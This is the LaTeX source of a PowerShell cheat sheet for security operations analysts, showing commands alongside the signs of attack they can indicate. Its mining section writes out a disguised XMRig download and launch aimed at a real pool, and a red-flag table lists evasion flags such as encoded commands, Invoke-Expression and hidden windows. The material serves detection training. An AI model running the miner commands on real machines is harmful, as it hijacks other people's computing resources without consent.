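% PowerShell for SOC cheat sheet (Cheatography export, author: levko).
% Two-column page of small tables pairing PowerShell and command-line
% commands with what a SOC analyst should read into them.
%
% The source had been collapsed onto a handful of physical lines, so every
% `%` comment swallowed the code that followed it. Line breaks are restored
% here so that comments end where they were meant to.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}   % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{levko}
\pdfinfo{
  /Title (powershell-for-soc.pdf)
  /Creator (Cheatography)
  /Author (levko)
  /Subject (PowerShell for SOC Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt}   % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
% \SetRowColor remembers the colour name globally so that \mymulticolumn,
% used later in the same row, can paint its cell with the same colour.
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{A03EA3}
\definecolor{LightBackground}{HTML}{F9F2F9}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
% NOTE(review): the logo path below is an absolute path from the generating
% server; presumably it has to be adjusted for a local build.
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large\textbf{\textcolor{DarkBackground}{\textrm{PowerShell for SOC Cheat Sheet}}} \\
    \normalsize by \textcolor{DarkBackground}{levko} via \textcolor{DarkBackground}{\uline{cheatography.com/217993/cs/48039/}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\textbf{\textcolor{white}{Cheatographer}}} \\
  \vspace{-2pt}levko \\
  \uline{cheatography.com/levko} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\textbf{\textcolor{white}{Cheat Sheet}}} \\
  \vspace{-2pt}Not Yet Published.\\
  Updated 4th May, 2026.\\
  Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\textbf{\textcolor{white}{Sponsor}}} \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

% --- Crypto Mining (XMRig): example download and launch, plus what to look for
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{\textcolor{white}{Crypto Mining (XMRig)}}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Scenario:} An attacker wants to use your company's electricity and CPU power to make money. They usually hide the miner in a temp folder.} \tn
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{`curl.exe -L -o C:\textbackslash{}temp\textbackslash{}sys\_update.exe https://github.com/xmrig `} \tn
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}temp\textbackslash{}sys\_update.exe -o pool.supportxmr.com:443 -u {[}Wallet\_Address{]} -p Lab\_Worker\_01 `} \tn
% Row 3 (review addition: ties the two commands above to observable signals)
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textbf{What to look for:} a download tool writing an .exe into a temp folder under a harmless-sounding name (here sys\_update.exe), then that file being started with -o (pool address), -u (wallet) and -p arguments, followed by sustained high CPU use.} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- How to run workshop
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{\textcolor{white}{How to run workshop}}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`Invoke-WebRequest -Uri {[}Workshop URL ask Yarin{]} -OutFile "C:\textbackslash{}Users\textbackslash{}Administrator\textbackslash{}Desktop\textbackslash{}workshop.ps1" `} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- File Management
\begin{tabularx}{8.4cm}{x{5.36 cm} x{2.64 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\textbf{\textcolor{white}{File Management}}} \tn
% Row 0
\SetRowColor{LightBackground}
`New-Item -ItemType Directory -Path "C:\textbackslash{}temp\textbackslash{}data"` & \textbf{Creates a Folder} \tn
% Row 1
\SetRowColor{white}
`New-Item -ItemType File -Path "C:\textbackslash{}temp\textbackslash{}note.txt"` & \textbf{Creates a File} \tn
% Row 2
\SetRowColor{LightBackground}
`Get-Content -Path "C:\textbackslash{}temp\textbackslash{}config.txt"` & \textbf{Reads a File} \tn
% Row 3: Add-Content appends to the file rather than rewriting it.
\SetRowColor{white}
`Add-Content -Path "C:\textbackslash{}temp\textbackslash{}note.txt" -Value "Hacked"` & \textbf{Edits a File} (appends the text to the end) \tn
% Row 4
\SetRowColor{LightBackground}
`Remove-Item -Path "C:\textbackslash{}temp\textbackslash{}note.txt"` & \textbf{Deletes a File} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% --- The "Dirty" Folders
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{\textcolor{white}{The "Dirty" Folders (Common Hiding Places)}}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{If you see a file being created or run from these paths, it is \textbf{highly suspicious}. Legitimate installers and updaters write here too, so check the parent process before escalating:} \tn
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}Users\textbackslash{}Public`} \tn
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}Windows\textbackslash{}Temp`} \tn
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}Users\textbackslash{}{[}User{]}\textbackslash{}AppData\textbackslash{}Local\textbackslash{}Temp`} \tn
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}ProgramData`} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- Identity & Host Recon
\begin{tabularx}{8.4cm}{x{1.444 cm} x{3.116 cm} x{3.04 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\textbf{\textcolor{white}{Identity \& Host Recon}}} \tn
% Row 0
\SetRowColor{LightBackground}
\seqsplit{`whoami`} & Shows the name of the logged-in user. & Look for this running immediately after a suspicious login. \tn
% Row 1
\SetRowColor{white}
\seqsplit{`\$env:COMPUTERNAME`} & Displays the name of the computer you are on. & Often the first thing an automated script checks. \tn
% Row 2
\SetRowColor{LightBackground}
\seqsplit{`Get-Process`} & Lists every program (process) currently running. & Look for processes with "odd" names or no description. \tn
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}

% --- PowerShell "Smell Test"
% The full parameter names are given next to the short forms because command
% lines in logs may use either spelling.
\begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\textbf{\textcolor{white}{PowerShell "Smell Test" (The Red Flags)}}} \tn
% Row 0
\SetRowColor{LightBackground}
`-enc` / \seqsplit{`-EncodedCommand`} & Hides the command in scrambled text. Top priority alert. The text is Base64; decode it to read the real command. Shorter spellings such as -e and -ec mean the same thing. \tn
% Row 1
\SetRowColor{white}
`iex` \seqsplit{(Invoke-Expression)} & Runs a piece of text as code. Combined with a web download it becomes "Download and run." This is how fileless malware starts. \tn
% Row 2: the flag on the command line is -ExecutionPolicy Bypass; "-Bypass" alone is not a parameter.
\SetRowColor{LightBackground}
`-Bypass` \seqsplit{(-ExecutionPolicy)} & Tells PowerShell to skip its script execution policy. Written as -ExecutionPolicy Bypass or -ep Bypass. \tn
% Row 3
\SetRowColor{white}
`-W Hidden` \seqsplit{(-WindowStyle)} & Runs the script silently so the user can't see it. \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% --- The five golden steps
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{\textcolor{white}{The five golden steps for De-Core Investigation}}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{1. Check the Parent: Did an unexpected parent such as Word or Excel launch PowerShell?} \tn
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{2. The Smell Test: Look for hidden, scrambled text or "iex" flags in the command.} \tn
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{3. Follow the Wire: Flag PowerShell connecting to unknown websites or downloading files.} \tn
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{4. Verify User: Does this specific user have a business reason to run admin scripts?} \tn
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{5. Trace the Files: Watch for new files created in "Dirty Folders" or evidence being deleted.} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- Basic & Network Commands
\begin{tabularx}{8.4cm}{x{2.204 cm} x{2.66 cm} x{2.736 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\textbf{\textcolor{white}{Basic \& Network Commands}}} \tn
% Row 0
\SetRowColor{LightBackground}
`curl.exe -O {[}URL{]}` & Used to "call" a website or download a file from a remote server. & Critical: Check the URL. Is it a known site or a strange IP address? \tn
% Row 1: -OutFile belongs to Invoke-WebRequest, which Windows PowerShell
% exposes under the alias wget; a standalone wget.exe takes -O instead.
\SetRowColor{white}
`wget {[}URL{]} -OutFile {[}Name{]}` & Similar to curl; used to download tools or malware from the internet. In Windows PowerShell, wget is an alias for Invoke-WebRequest. & PowerShell using wget to save a file in C:\textbackslash{}Temp is highly suspicious. A separate wget.exe is not part of Windows, so ask how it got there. \tn
% Row 2
\SetRowColor{LightBackground}
\seqsplit{`Get-NetTCPConnection`} & Shows every active "phone call" the computer is making to other computers. & Look for rows where State is Established to see who the machine is talking to right now. OwningProcess is the process ID to match against Get-Process. \tn
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}

% That's all folks
\end{multicols*}

\end{document}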